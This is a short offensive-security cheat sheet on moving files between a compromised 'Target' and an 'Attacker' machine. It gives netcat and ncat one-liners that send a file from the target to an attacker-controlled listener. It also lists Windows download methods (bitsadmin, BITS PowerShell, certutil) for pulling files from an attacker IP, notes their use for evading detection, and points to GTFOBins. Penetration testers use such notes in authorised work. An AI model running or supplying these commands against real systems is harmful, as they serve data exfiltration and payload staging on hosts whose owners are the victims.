Miscellaneous

The different applications/tools can also be used for file transfer (also useful for Evading Detection).

Linux

+file download +file upload

GTFOBinsgtfobins.github.io

Windows

Netcat

File transfer from Target to Attacker

Listening on Attacker

Attacker:

nc -l -p <PORT> > <NEW_NAME>

Target:

nc -q 0 <IP> <PORT> < <FILE>

Listening on Target

Ncat

File transfer from Target to Attacker

Listening on Attacker

Attacker:

ncat -l -p <PORT> --recv-only > <NEW_NAME>

Target:

ncat --send-only <IP> <PORT> < <FILE>

Listening on Target

bitsadmin

Downloading files on Windows.

bitsadmin /transfer wcb /priority foreground http://<IP>:<PORT>/<FILE> <NEW_NAME>

BITS

Allows downloading and uploading files on Windows.

Import-Module bitstransfer; Start-BitsTransfer -Source "http://<IP>:<PORT>/<FILE>" -Destination "<NEW_NAME>"

For the upload try to reverse the source and destination arguments, setting a Server Python3 with Upload Option (and self-signed certificate).

certutil

Downloading files on Windows.

certutil.exe -verifyctl -split -f http://<IP>:<PORT>/<FILE>